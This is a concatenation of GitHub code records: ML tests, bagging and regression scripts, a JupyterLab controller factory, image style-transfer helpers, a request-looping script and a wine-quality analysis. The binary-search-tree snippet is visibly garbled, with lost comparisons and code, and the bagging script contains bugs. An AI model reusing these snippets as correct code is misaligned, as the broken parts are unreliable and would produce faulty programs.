pytest.raises(KeyError):\n auto = Classification(\n train_df,\n test_df,\n algorithm='custom',\n class_name = \"worng-class-name\",\n file_path = \"auxiliary/scripts/dummy.py\",\n )\n auto.run()\n \ndef test_using_wrong_custom_classifier_file_path_fails():\n with pytest.raises(FileNotFoundError):\n auto = Classification(\n train_df,\n test_df,\n algorithm='custom',\n class_name = \"worng-class-name\",\n file_path = \"auxiliary/scripts/daaa.py\",\n )\n auto.run()\n\ndef test_using_unsupported_classifier_fails():\n with pytest.raises(AssertionError):\n auto = Classification(\n train_df,\n test_df,\n algorithm='Batman'\n )\n auto.run()\n\ndef 
test_using_empty_train_df_fails():\n with pytest.raises(AssertionError):\n train_df = pd.DataFrame()\n auto = Classification(\n train_df,\n test_df,\n algorithm='RF'\n )\n auto.run()\n\ndef test_using_empty_test_df_fails():\n with pytest.raises(AssertionError):\n test_df = pd.DataFrame()\n auto = Classification(\n train_df,\n test_df,\n algorithm='RF'\n )\n auto.run()","repo_name":"blitzml/blitzml","sub_path":"test_blitzml_tabular_Classification.py","file_name":"test_blitzml_tabular_Classification.py","file_ext":"py","file_size_in_byte":4674,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"28979578455","text":"#基本分类器为逻辑回归,数据集:马疝病\n#ratio=0.8, bagnum=21 ,错误率0.31,0.32,0.26,...\n#ratio=1.0, bagnum=21 ,错误率0.26,0.23,0.28,...\n#原始的逻辑回归分类,错误率:0.35左右\nfrom numpy import *\n\ndef loadData(fileName):\n fr = open(fileName)\n numDimen = len(fr.readline().split(\"\\t\"))\n dataMatrix = []\n labelMatrix = []\n for line in fr.readlines():\n arrFea = []\n arrLine = line.strip().split(\"\\t\")\n for i in range(numDimen-1):\n arrFea.append(float(arrLine[i]))\n dataMatrix.append(arrFea)\n labelMatrix.append(float(arrLine[-1]))\n return dataMatrix,labelMatrix\n\ndef sigmoid(inx):\n return 1.0/(1+exp(-inx))\n\n#***改进的随机梯度上升法\n#随机遍历每个样本,更新参数;\n#循环多次遍历样本集\n#输入:训练数据dataMatrix,类别标签classLabels,默认迭代次数numIter\ndef sortGradientAscent(dataMatrix, classLabels, numIter):\n # print(\"dataMatrix\",dataMatrix)\n # print(\"classLabels\",classLabels)\n # m 训练样本个数 n 特征维数\n m,n = shape(dataMatrix)\n # 回归系数,1 x n行向量,n个特征对应n个回归系数 init 1\n weights= ones(n)\n # loop numIter times\n for j in range(numIter):\n # create index 0 ~ m-1\n dataIndex = range(m)\n # loop each sample\n for i in range(m):\n # update steps\n alpha = 4.0/(i+j+1.0)+0.01\n # choose an index\n randIndex = int(random.uniform(0,len(dataIndex)))\n # model predict value\n h = sigmoid(sum(dataMatrix[randIndex]*weights))\n # calculate predict error\n error = classLabels[randIndex] - h\n # update Regression confiction\n weights = weights + alpha * error * dataMatrix[randIndex]\n # delete sample which was used to update confiction\n delete(dataMatrix, randIndex)\n return weights\n\n#***分类函数\n#输入:待分类的数据inX,更新好的回归系数\ndef classifyVector(inx, weights):\n # use sigmoid function predict\n prob = sigmoid(sum(inx*weights))\n # if prob bigger than 0.5 classify to 1\n if prob > 0.5:\n return 1.0\n else:\n return 0.0\n\n# LR errorrate PRedict\ndef LRPredict(dataSet, classLabels, testData, testLabel):\n # calculate weights\n weights = sortGradientAscent(dataSet, classLabels, numIter=200)\n # count error number\n errorCount = 0\n for i in range(len(testData)):\n if int(classifyVector(testData[i,:], weights)) != testLabel[i]:\n errorCount += 1\n # calculate error rate\n errorRateLR = (float(errorCount)/len(testLabel))\n return errorRateLR\n\n#有放回的采样\n#dataSet:数据集(不含类别标签)\n#labels:类别标签\n#bagCapacity:每次有放回的抽取样本数\ndef baggingSample(dataSet, labels, bagCapacity):\n randIndex = []\n for i in range(bagCapacity):\n index = int(random.uniform(0, bagCapacity))\n randIndex.append(index)\n sampleData = dataSet[randIndex,:]\n sampleLabel = labels[randIndex]\n return sampleData,sampleLabel\n\n#bagging方法得到多个分类器,预测多个结果进行投票表决\ndef majorityCnt(labelList):\n # create dictionary the number of samples : classify\n items = dict([((labelList.count(i),i))for i in labelList])\n # return the samples of the most classify\n return items[max(items.keys())]\n\ndef baggingLRPredict(dataSet, labelList, testData, testLabel, sampleRatio, bagNum):\n 
bagCapacity = int(len(dataSet)*sampleRatio)\n numTest = len(testLabel)\n predictTestArr = zeros((numTest, bagNum))\n for i in range(bagNum):\n bagData,bagLabel = baggingSample(dataSet, labelList, bagCapacity)\n weights = sortGradientAscent(bagData, bagLabel, numIter=100)\n for j in range(numTest):\n predictTestArr[j,i] = int(classifyVector(testData[j,:], weights))\n errCount = 0\n for j in range(numTest):\n if majorityCnt(list(predictTestArr[j,:])) != testLabel[j]:\n errCount +=1\n errRate = float(errCount)/numTest\n return errRate,predictTestArr\n\n\nif __name__ == '__main__':\n dataSet,labelMatrix = loadData(\"/Users/scofield/MLRep/Data/horseColicTraining.txt\")\n testData,testLabel = loadData(\"/Users/scofield/MLRep/Data/horseColicTest.txt\")\n dataSet = array(dataSet)\n labelMatrix = array(labelMatrix)\n testData = array(testData)\n testLabel = array(testLabel)\n errorRateLR= []\n # for i in range(5):\n # errorRate = LRPredict(dataSet, labelMatrix, testData, testLabel)\n # errorRateLR.append(errorRate)\n # print(\"All error rate of LR classification is : \" , errorRate)\n # print(\"Average of LR classification : \" , sum(errorRate)/5)\n\n errorRateAll=[]\n for i in range(5):\n sampleRatio = 1.0\n bagNum = 21\n errorRate,pretestArr = baggingLRPredict(dataSet, labelMatrix, testData, testLabel, sampleRatio, bagNum)\n errorRateAll.append(errorRate)\n print(\"All error rate of LR classification is : \" , errorRate)\n print(\"Average of LR classification : \" , sum(errorRateAll)/5)","repo_name":"ScofieldShen/MLRep","sub_path":"ML/Bagging/Bagging_Classify.py","file_name":"Bagging_Classify.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12243756968","text":"\"\"\"Component factory and global and per-request context management.\"\"\"\n\nfrom __future__ import annotations\n\nfrom collections.abc import AsyncIterator\nfrom contextlib import aclosing, asynccontextmanager\nfrom dataclasses import dataclass\nfrom typing import Self\n\nimport structlog\nfrom httpx import AsyncClient\nfrom kubernetes_asyncio.client.api_client import ApiClient\nfrom safir.dependencies.http_client import http_client_dependency\nfrom safir.slack.webhook import SlackWebhookClient\nfrom structlog.stdlib import BoundLogger\n\nfrom .config import Config\nfrom .models.v1.prepuller_config import DockerSourceConfig, GARSourceConfig\nfrom .services.builder.fileserver import FileserverBuilder\nfrom .services.builder.lab import LabBuilder\nfrom .services.builder.prepuller import PrepullerBuilder\nfrom .services.fileserver import FileserverStateManager\nfrom .services.form import FormManager\nfrom .services.image import ImageService\nfrom .services.lab import LabManager\nfrom .services.prepuller import Prepuller\nfrom .services.size import SizeManager\nfrom .services.source.base import ImageSource\nfrom .services.source.docker import DockerImageSource\nfrom .services.source.gar import GARImageSource\nfrom .services.state import LabStateManager\nfrom .storage.docker import DockerStorageClient\nfrom .storage.gafaelfawr import GafaelfawrStorageClient\nfrom .storage.gar import GARStorageClient\nfrom .storage.kubernetes.fileserver import FileserverStorage\nfrom .storage.kubernetes.lab import LabStorage\nfrom .storage.kubernetes.node import NodeStorage\nfrom .storage.kubernetes.pod import PodStorage\nfrom .storage.metadata import MetadataStorage\n\n\n@dataclass(frozen=True, slots=True)\nclass ProcessContext:\n \"\"\"Per-process 
global application state.\n\n This object holds all of the per-process singletons and is managed by\n `~jupyterlabcontroller.dependencies.context.ContextDependency`. It is used\n by the `Factory` class as a source of dependencies to inject into created\n service and storage objects, and by the context dependency as a source of\n singletons that should also be exposed to route handlers via the request\n context.\n \"\"\"\n\n config: Config\n \"\"\"Lab controller configuration.\"\"\"\n\n http_client: AsyncClient\n \"\"\"Shared HTTP client.\"\"\"\n\n kubernetes_client: ApiClient\n \"\"\"Shared Kubernetes client.\"\"\"\n\n image_service: ImageService\n \"\"\"Image service.\"\"\"\n\n prepuller: Prepuller\n \"\"\"Prepuller.\"\"\"\n\n lab_state: LabStateManager\n \"\"\"State management for user lab pods.\"\"\"\n\n fileserver_state: FileserverStateManager\n \"\"\"State management for user fileservers.\"\"\"\n\n @classmethod\n async def from_config(cls, config: Config) -> Self:\n \"\"\"Create a new process context from the controller configuration.\n\n Parameters\n ----------\n config\n Lab controller configuration.\n\n Returns\n -------\n ProcessContext\n Shared context for a lab controller process.\n \"\"\"\n http_client = await http_client_dependency()\n kubernetes_client = ApiClient()\n\n # This logger is used only by process-global singletons. Everything\n # else will use a per-request logger that includes more context about\n # the request (such as the authenticated username).\n logger = structlog.get_logger(__name__)\n\n slack_client = None\n if config.slack_webhook:\n slack_client = SlackWebhookClient(\n config.slack_webhook, config.safir.name, logger\n )\n\n if isinstance(config.images.source, DockerSourceConfig):\n docker_client = DockerStorageClient(\n credentials_path=config.docker_secrets_path,\n http_client=http_client,\n logger=logger,\n )\n source: ImageSource = DockerImageSource(\n config=config.images.source,\n docker=docker_client,\n logger=logger,\n )\n elif isinstance(config.images.source, GARSourceConfig):\n gar_client = GARStorageClient(logger)\n source = GARImageSource(\n config=config.images.source, gar=gar_client, logger=logger\n )\n else:\n raise TypeError(\"Unknown prepuller configuration type\")\n\n metadata_storage = MetadataStorage(config.metadata_path)\n image_service = ImageService(\n config=config.images,\n source=source,\n node_storage=NodeStorage(kubernetes_client, logger),\n slack_client=slack_client,\n logger=logger,\n )\n size_manager = SizeManager(config.lab.sizes)\n lab_builder = LabBuilder(\n config=config.lab,\n size_manager=size_manager,\n instance_url=config.base_url,\n logger=logger,\n )\n fileserver_builder = FileserverBuilder(\n config=config.fileserver,\n instance_url=config.base_url,\n volumes=config.lab.volumes,\n logger=logger,\n )\n return cls(\n config=config,\n http_client=http_client,\n image_service=image_service,\n kubernetes_client=kubernetes_client,\n prepuller=Prepuller(\n image_service=image_service,\n prepuller_builder=PrepullerBuilder(\n metadata_storage=metadata_storage,\n pull_secret=config.lab.pull_secret,\n ),\n metadata_storage=metadata_storage,\n pod_storage=PodStorage(kubernetes_client, logger),\n slack_client=slack_client,\n logger=logger,\n ),\n lab_state=LabStateManager(\n config=config.lab,\n size_manager=size_manager,\n lab_builder=lab_builder,\n lab_storage=LabStorage(kubernetes_client, logger),\n slack_client=slack_client,\n logger=logger,\n ),\n fileserver_state=FileserverStateManager(\n config=config.fileserver,\n 
fileserver_builder=fileserver_builder,\n fileserver_storage=FileserverStorage(\n kubernetes_client, logger\n ),\n logger=logger,\n ),\n )\n\n async def aclose(self) -> None:\n \"\"\"Free allocated resources.\"\"\"\n await self.kubernetes_client.close()\n\n async def start(self) -> None:\n \"\"\"Start the background threads running.\"\"\"\n await self.image_service.start()\n await self.prepuller.start()\n await self.lab_state.start()\n if self.config.fileserver.enabled:\n await self.fileserver_state.start()\n\n async def stop(self) -> None:\n \"\"\"Clean up a process context.\n\n Called during shutdown, or before recreating the process context using\n a different configuration.\n \"\"\"\n if self.config.fileserver.enabled:\n await self.fileserver_state.stop()\n await self.prepuller.stop()\n await self.image_service.stop()\n await self.lab_state.stop()\n\n\nclass Factory:\n \"\"\"Build lab controller components.\n\n Uses the contents of a `ProcessContext` to construct the components of the\n application on demand.\n\n Parameters\n ----------\n context\n Shared process context.\n logger\n Logger to use for messages.\n \"\"\"\n\n @classmethod\n @asynccontextmanager\n async def standalone(cls, config: Config) -> AsyncIterator[Self]:\n \"\"\"Async context manager for lab controller components.\n\n Intended for background jobs or the test suite.\n\n Parameters\n ----------\n config\n Lab controller configuration\n\n Yields\n ------\n Factory\n Newly-created factory. Must be used as a context manager.\n \"\"\"\n logger = structlog.get_logger(__name__)\n context = await ProcessContext.from_config(config)\n factory = cls(context, logger)\n async with aclosing(factory):\n yield factory\n\n def __init__(self, context: ProcessContext, logger: BoundLogger) -> None:\n self._context = context\n self._logger = logger\n self._background_services_started = False\n\n @property\n def image_service(self) -> ImageService:\n \"\"\"Global image service, from the `ProcessContext`.\n\n Only used by tests; handlers have access to the image service via the\n request context.\n \"\"\"\n return self._context.image_service\n\n @property\n def lab_state(self) -> LabStateManager:\n \"\"\"Global lab state manager, from the `ProcessContext`.\n\n Only used by tests; handlers have access to the lab state manager via\n the request context.\n \"\"\"\n return self._context.lab_state\n\n @property\n def prepuller(self) -> Prepuller:\n \"\"\"Global prepuller, from the `ProcessContext`.\n\n Only used by tests; handlers don't need access to the prepuller.\n \"\"\"\n return self._context.prepuller\n\n async def aclose(self) -> None:\n \"\"\"Shut down the factory.\n\n After this method is called, the factory object is no longer valid and\n must not be used.\n \"\"\"\n if self._background_services_started:\n await self._context.stop()\n await self._context.aclose()\n\n def create_docker_storage(self) -> DockerStorageClient:\n \"\"\"Create a Docker storage client.\n\n Returns\n -------\n DockerStorageClient\n Newly-created Docker storage client.\n \"\"\"\n return DockerStorageClient(\n credentials_path=self._context.config.docker_secrets_path,\n http_client=self._context.http_client,\n logger=self._logger,\n )\n\n def create_form_manager(self) -> FormManager:\n \"\"\"Create service to generate lab spawning forms.\n\n Returns\n -------\n FormManager\n Newly-created form manager.\n \"\"\"\n return FormManager(\n image_service=self._context.image_service,\n lab_sizes=self._context.config.lab.sizes,\n logger=self._logger,\n )\n\n def 
create_gafaelfawr_client(self) -> GafaelfawrStorageClient:\n \"\"\"Create client to look up users in Gafaelfawr.\n\n Returns\n -------\n GafaelfawrStorageClient\n Newly-created Gafaelfawr client.\n \"\"\"\n return GafaelfawrStorageClient(\n config=self._context.config,\n http_client=self._context.http_client,\n logger=self._logger,\n )\n\n def create_lab_builder(self) -> LabBuilder:\n \"\"\"Create builder service for user labs.\n\n Returns\n -------\n LabBuilder\n Newly-created lab builder.\n \"\"\"\n return LabBuilder(\n config=self._context.config.lab,\n size_manager=self.create_size_manager(),\n instance_url=self._context.config.base_url,\n logger=self._logger,\n )\n\n def create_lab_manager(self) -> LabManager:\n \"\"\"Create service to manage user labs.\n\n Returns\n -------\n LabManager\n Newly-created lab manager.\n \"\"\"\n metadata_storage = MetadataStorage(self._context.config.metadata_path)\n return LabManager(\n instance_url=self._context.config.base_url,\n lab_state=self._context.lab_state,\n lab_builder=self.create_lab_builder(),\n image_service=self._context.image_service,\n size_manager=self.create_size_manager(),\n metadata_storage=metadata_storage,\n lab_storage=self.create_lab_storage(),\n lab_config=self._context.config.lab,\n slack_client=self.create_slack_client(),\n logger=self._logger,\n )\n\n def create_lab_storage(self) -> LabStorage:\n \"\"\"Create Kubernetes storage object for user labs.\n\n Returns\n -------\n LabStorage\n Newly-created lab storage.\n \"\"\"\n return LabStorage(self._context.kubernetes_client, self._logger)\n\n def create_size_manager(self) -> SizeManager:\n \"\"\"Create service to map between named sizes and resource amounts.\n\n Returns\n -------\n SizeManager\n Newly-created size manager.\n \"\"\"\n return SizeManager(self._context.config.lab.sizes)\n\n def create_slack_client(self) -> SlackWebhookClient | None:\n \"\"\"Create a client for sending messages to Slack.\n\n Returns\n -------\n SlackWebhookClient or None\n Configured Slack client if a Slack webhook was configured,\n otherwise `None`.\n \"\"\"\n if not self._context.config.slack_webhook:\n return None\n return SlackWebhookClient(\n self._context.config.slack_webhook,\n self._context.config.safir.name,\n self._logger,\n )\n\n def set_logger(self, logger: BoundLogger) -> None:\n \"\"\"Replace the internal logger.\n\n Used by the context dependency to update the logger for all\n newly-created components when it's rebound with additional context.\n\n Parameters\n ----------\n logger\n New logger.\n \"\"\"\n self._logger = logger\n\n async def start_background_services(self) -> None:\n \"\"\"Start global background services managed by the process context.\n\n These are normally started by the context dependency when running as a\n FastAPI app, but the test suite may want the background processes\n running while testing with only a factory.\n\n Only used by the test suite.\n \"\"\"\n await self._context.start()\n self._background_services_started = True\n","repo_name":"lsst-sqre/jupyterlab-controller","sub_path":"src/jupyterlabcontroller/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":13826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70388569130","text":"import requests\n\nurl = \"https://0ijq1i6sp1.execute-api.us-east-1.amazonaws.com/dev/stream\"\noutput_file = \"output.txt\"\n\nfor i in range(1000):\n response = requests.get(url)\n output = response.text.strip()\n \n with open(output_file, 
\"a\") as f:\n f.write(output + \"\\n\")\n\n","repo_name":"VaibhavRumale/Scripts","sub_path":"ramp.py","file_name":"ramp.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24046877034","text":"from PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt \nimport PIL \n\nimport importlib\nfrom scipy.optimize import fmin_l_bfgs_b\nfrom scipy.misc import imsave\nimport scipy.ndimage.filters\n\nfrom keras import metrics\nfrom vgg16_avg import VGG16_Avg\n\ndef img_resize(img):\n '''Resize the image to less than 500 x 500. \n Args:\n img: an actual image. \n ''' \n if (img.size[0]>500) or (img.size[1]>500):\n factor = (img.size[0]+img.size[1])/1000\n img = img.resize(np.divide(img.size, factor).astype('int32'))\n return img\n\n\ndef img_norm(img_arr):\n '''Normalize an image np array against imagenet mean and return as np array.\n Args:\n img_arr: a numpy array of an image.\n '''\n imagenet_mean = [123.68, 116.779, 103.939]\n rn_mean = np.array((imagenet_mean), dtype=np.float32) \n img_arr = (img_arr- rn_mean)[:, :, :, ::-1] # Flip the channels from RGB to BGR\n return img_arr\n\ndef load_image(size, path):\n '''Load image from disc and return as np array.\n Args:\n size: The desired dimensions of the output image.\n path: The full path of the image to load.\n '''\n width, height = size\n img = Image.open(path)\n img = img.resize((width, height))\n img_arr = np.array(img)\n img_arr = np.expand_dims(img_arr, 0)\n return img_arr\n\ndef get_content(size, content_path):\n '''Get content image from disc and return as a np array.\n Args:\n size: The desired dimensions of the output image.\n content_path: The full path of the content image to load.\n '''\n img_arr = load_image(size, content_path)\n img_arr = img_norm(img_arr)\n return img_arr\n\ndef load_tile_image(size, tilesize, path):\n '''Load image from disc and return the created tiled image as np array.\n Args:\n size: The desired dimensions of output image.\n tilesize: The desired dimensions of output unit tile image.\n path: The full path to the imag to load.\n '''\n width, height = size\n tile_width, tile_height = tilesize\n \n if (tile_width > width) or (tile_height > height):\n raise ValueError(\n 'Tile size needs to be smaller than the image size')\n img = Image.open(path)\n \n tile_img = img.resize((tile_width, tile_height)) \n tile_img = htile_style(img, int(width/tile_width))\n img = vtile_style(tile_img, int(height/tile_height))\n \n img = img.resize((width, height))\n img_arr = np.array(img)\n img_arr = np.expand_dims(img_arr, 0)\n return img_arr\n \ndef get_style_tile(size, tilesize, style_path):\n '''Get style image from disc and return the created tile image as np array\n Args: \n size: The desired dimensions of output image.\n tilesize: The desired dimensions of output unit tile image.\n style_path: The full path to the imag to load. 
\n '''\n style_arr = load_tile_image(size, tilesize, style_path)\n style_arr = img_norm(style_arr[:,:,:,:3])\n return style_arr\n\n\ndef get_style(size, style_path):\n '''Get style image from disc and return as a np array.\n Args:\n size: The desired dimensions of the output image.\n style_path: The full path of the style image to load.\n '''\n style_arr = load_image(size, style_path)\n style_arr = img_norm(style_arr[:,:,:,:3])\n return style_arr\n\ndef htile_style(style, num):\n '''Get style image and the number of tiles horizontally and return a new image object\n Args:\n style: the style image\n num: the desired number of tiles horizontally \n '''\n imgs = [style for i in range(num)]\n min_shape = sorted( [(np.sum(i.size), i.size ) for i in imgs])[0][1]\n imgs_comb = np.hstack( (np.asarray( i.resize(min_shape) ) for i in imgs ) )\n imgs_comb = PIL.Image.fromarray( imgs_comb)\n return imgs_comb\n\ndef vtile_style(style, num):\n '''Get style image and the number of tiles vertically and return a new image object\n Args:\n style: the style image\n num: the desired number of tiles vertically \n '''\n imgs = [style for i in range(num)]\n min_shape = sorted( [(np.sum(i.size), i.size ) for i in imgs])[0][1]\n imgs_comb = np.vstack( (np.asarray( i.resize(min_shape) ) for i in imgs ) )\n imgs_comb = PIL.Image.fromarray( imgs_comb)\n return imgs_comb\n\ndef deprocess(img_arr): \n '''Returns processed image back to normal as a np array \n Args:\n img_arr: a previously processed image np array \n '''\n rank = len(img_arr.shape)\n if (rank == 4):\n # Remove extra batch dimension\n img_arr = np.squeeze(img_arr, axis = 0)\n \n #flip the channels from BRG to RBG \n img_arr = img_arr[:, :, ::-1] \n \n # Remove zero-center by image mean pixel\n imagenet_mean = [123.68, 116.779, 103.939]\n rn_mean = np.array((imagenet_mean), dtype=np.float32) \n img_arr = img_arr + rn_mean \n img_arr = np.clip(img_arr, 0, 255).astype('uint8') # Clip for better quality image\n \n return img_arr\n\ndef plot_arr(img_arr):\n '''Plot a image with a processed image array\n Args:\n arr: a previously processed image np array\n ''' \n img_arr = deprocess(img_arr)\n plt.imshow(img_arr)\n return\n\nclass Evaluator(object):\n def __init__(self, f, shp): self.f, self.shp = f, shp\n\n def loss(self, x):\n loss_, self.grad_values = self.f([x.reshape(self.shp)])\n return loss_.astype(np.float64)\n\n def grads(self, x): return self.grad_values.flatten().astype(np.float64)\n\n","repo_name":"xxlatgh/fastaipart2","sub_path":"lesson1/myutils.py","file_name":"myutils.py","file_ext":"py","file_size_in_byte":5647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41052096988","text":"# -*- coding: utf-8 -*-\n# -*- author: jokker -*-\n\n# 参考 : https://www.liaoxuefeng.com/wiki/897692888725344/973805065315456\n\nfrom collections import namedtuple\n\n\"\"\"\n但是,看到(1, 2),很难看出这个tuple是用来表示一个坐标的。定义一个class又小题大做了,这时,namedtuple就派上了用场\n\"\"\"\n\nPoint = namedtuple('Point', ['x', 'y'])\np = Point(1, 2)\nprint(p.x)\nprint(p.y)\n\n# 这个特性在很多的地方非常有用,在 出 xml 中的 table 的时候,都是用的字典来做,如果用一个这样的 tuple 
like this would be much more convenient; a really nice way of thinking about it.\n\n\"\"\"\nnamedtuple is a factory function that creates a custom tuple subclass: it fixes the number of elements in the tuple and lets each element be referenced by attribute name instead of by index.\nIn this way, namedtuple makes it very easy to define a data type that keeps the immutability of a tuple while still being accessible by attribute, which is very convenient to use.\n\"\"\"\n","repo_name":"newjokker/PyUtil","sub_path":"BuiltinModule/Collections/namedtuple.py","file_name":"namedtuple.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32392952017","text":"class node:\n    def __init__(self,d):\n        self.d=d\n        r,l=None,None\n\nroot=None\ndef add(d):\n    global root\n    n=node(d)\n    if root==None:\n        root=n\n        return\n    a=root\n    if d>root.d:\n        b=a.r\n    elif db.d:\n                a,b=b,b.r\n            elif da.d:\n        a.r=n\n    elif d3\ndef remove_rows_std_outlier(df,column):\n    before_count=df[column].count()\n    df.drop(df.index[abs(df[column]) > 3], inplace=True)\n    after_count=df[column].count()\n    count=before_count-after_count\n    print('Removing outliers in column : {}\\nNumber of outliers removed : {}'.format(column,count))\n\n#index_list=wine_s1[abs(wine_s1['fixed acidity']) > 3].index\n#wine.drop(wine.index[index_list])\n\nfor column in wine_s1.columns:\n    if column != 'quality' :\n        remove_rows_std_outlier(wine_s1,column)\n    \n\nwine_s1.drop('quality',axis=1,inplace=True) \nsns.boxplot(data=wine_s1).set_title(\"After removing outliers\")\n\n#######################################################################################\n\n#--------- Linear Regression using OLS ---------------\n\n    # --- Preparing the Data For linear Regression ------------\ndef remove_rows_outlier(df,column):\n    df_col_mean=df[column].mean()\n    df_col_std=df[column].std()\n    df.drop(df.index[abs((df[column] - df_col_mean) / df_col_std) > 3], inplace=True)\n    \nwine_noout=wine.copy()\nfor column in wine_noout.columns:\n    if column != 'quality' :\n        remove_rows_outlier(wine_noout,column)\n\nwine_X = wine_noout.drop(['density','quality'],axis=1)\nwine_y = wine_noout['density']\n\nwine_X.columns\n    # --- Splitting the Data For Training and Testing ------------\n    \nX_train, X_test, y_train, y_test = train_test_split(wine_X,wine_y, test_size=0.3, random_state=999)\nX_train=stm.add_constant(X_train)\nX_test=stm.add_constant(X_test)\n\n\n#---------- Backward Feature Elimination after setting significance level at 0.05 ----------------\n\ndef remove_maxpvalcol(drop_col,X_train,X_test): \n    X_train.drop([drop_col],axis=1,inplace=True)\n    X_test.drop([drop_col],axis=1,inplace=True)\ni=0\nwhile True: \n    OLS = stm.OLS(y_train,X_train)\n    OLSR = OLS.fit()\n    OLSR_pval_max=OLSR.pvalues.max()\n    i+=1\n    if OLSR_pval_max > 0.05:\n        drop_col=OLSR.pvalues[OLSR.pvalues==OLSR_pval_max].index[0]\n        print('For iteration no : {} \\n the max pval is for {} column and the value is {}'.format(i,drop_col,OLSR_pval_max))\n        print('Dropping column : {}'.format(drop_col)) \n        remove_maxpvalcol(drop_col,X_train,X_test)\n    else:\n        print('all the pvalues for the selected explanatory set is <0.05')\n        break\n\nprint(OLSR.summary())\n\ny_pred = OLSR.predict(X_test)\ny_train_pred = OLSR.predict(X_train)\n\n\n#------------------- Metrics related to OLSR ------------\n\nplt.title('Comparison of Y values in test and the Predicted values')\nplt.ylabel('Test Set')\nplt.xlabel('Predicted values')\nplt.scatter(y_test,y_pred, marker ='+')\n\nprint('MAE:', metrics.mean_absolute_error(y_test, y_pred))\nprint('MSE:', metrics.mean_squared_error(y_test, y_pred))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, y_pred)))\nprint('R2 :' , 
r2_score(y_test,y_pred))\nprint(OLSR.rsquared)\n\n\n\n\n#sns.pairplot(,x_vars=['fixed acidity', 'residual sugar', 'chlorides', 'free sulfur dioxide', 'total sulfur dioxide', 'pH', 'sulphates','alcohol'], y_vars='density', size=7, aspect=0.7, kind='reg')\n\n######################################################################################\n\n\n# ---------------------- prepare and run k-fold for Linear Regression --------\nwine_X = wine_noout.drop(['density','quality'],axis=1)\nwine_y = wine_noout['density']\n\n# - Backward Feature Elimination on entire dataset.\nwine_X =stm.add_constant(wine_X)\ni=0\nwhile True: \n OLS = stm.OLS(wine_y,wine_X)\n OLSR = OLS.fit()\n OLSR_pval_max=OLSR.pvalues.max()\n i+=1\n if OLSR_pval_max > 0.05:\n drop_col=OLSR.pvalues[OLSR.pvalues==OLSR_pval_max].index[0]\n print('For iteration no : {} \\n the max pval is for {} column and the value is {}'.format(i,drop_col,OLSR_pval_max))\n print('Dropping column : {}'.format(drop_col)) \n wine_X.drop([drop_col],axis=1,inplace=True)\n else:\n print('all the pvalues for the selected explanatory set is <0.05')\n break\n \nOLSR.rsquared\n\n# Training and validating using Kfold where n=10\nfrom sklearn.model_selection import KFold\nkf = KFold(n_splits=10,random_state=9, shuffle=False)\nwine_X = wine_noout.drop(['density','quality'],axis=1)\nwine_y = wine_noout['density']\nwine_X =stm.add_constant(wine_X)\nr2_tot=0\nrsquared_total,n=0,1\nfor train_index, test_index in kf.split(wine_X):\n #print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n X_train, X_test = wine_X.iloc[train_index,:], wine_X.iloc[test_index,:]\n y_train, y_test = wine_y.iloc[train_index], wine_y.iloc[test_index]\n OLS = stm.OLS(y_train,X_train)\n OLSR = OLS.fit()\n y_pred = OLSR.predict(X_test)\n rsquared=OLSR.rsquared\n rsquared_total+=rsquared\n rsquared_mean=rsquared_total/n\n r2=r2_score(y_test,y_pred)\n print(\"Kfold# = {} \\t R-Squared = {} \\t R-Squared-mean ={} \\t Trained_r2 = {}\".format(n,rsquared,rsquared_mean,r2))\n r2_tot+=r2 \n r2_mean=r2_tot/n\n n+=1\n \nprint(r2_mean) \nprint(OLSR.summary())\n\n\n########################################################################################\n\n# Prepare for Classification Modeling.\n#removing free Sulphur dioxide as it looks to have a similar effect as TotalSulphurDioxide.\n\nwine_clean=wine_noout.copy()\nwine_clean.drop(['free sulfur dioxide'],axis=1,inplace=True)\n\nlevel_Rating_3 = []\nfor i in wine_clean['quality']:\n if i >= 1 and i <= 3:\n level_Rating_3.append('1')\n elif i >= 4 and i <= 7:\n level_Rating_3.append('2')\n elif i >= 8 and i <= 10:\n level_Rating_3.append('3')\nwine_clean['LR3'] = level_Rating_3\n\nwine_X= wine_clean.drop(['quality','LR3'],axis=1)\nwine_y=wine_clean['LR3']\n \nX_train, X_test, y_train, y_test = train_test_split(wine_X, wine_y, random_state = 0)\nfrom sklearn.linear_model import LogisticRegression\ndef LRfit():\n lr = LogisticRegression()\n lr.fit(X_train, y_train)\n lr.decision_function(X_train)\n global y_pred\n y_pred = lr.predict(X_test)\n\nLRfit()\n\n#create confusion matrix and return accuracy score\ndef scores(y_test, y_pred):\n print(\"Confusion Matrix : \\n\",confusion_matrix(y_test, y_pred))\n print('Accuracy = {}'.format(accuracy_score(y_test, y_pred)*100))\n print('precision = {}'.format(precision_score(y_test, y_pred,average=None)))\n print('sensitivity = {}'.format(recall_score(y_test, y_pred,average=None)))\n print(classification_report(y_test,y_pred))\nscores(y_test, y_pred) 
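\n\n# Illustrative aside, a minimal sketch only (assumes wine_X, wine_y and LogisticRegression exactly as defined above):\n# scikit-learn's cross_val_score runs the same split/fit/score K-fold loop internally, so it gives a quick\n# cross-check for the manual K-fold loops implemented below.\nfrom sklearn.model_selection import cross_val_score\ncv_scores = cross_val_score(LogisticRegression(), wine_X, wine_y, cv=5)\nprint('cross_val_score mean accuracy = {}'.format(cv_scores.mean()))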
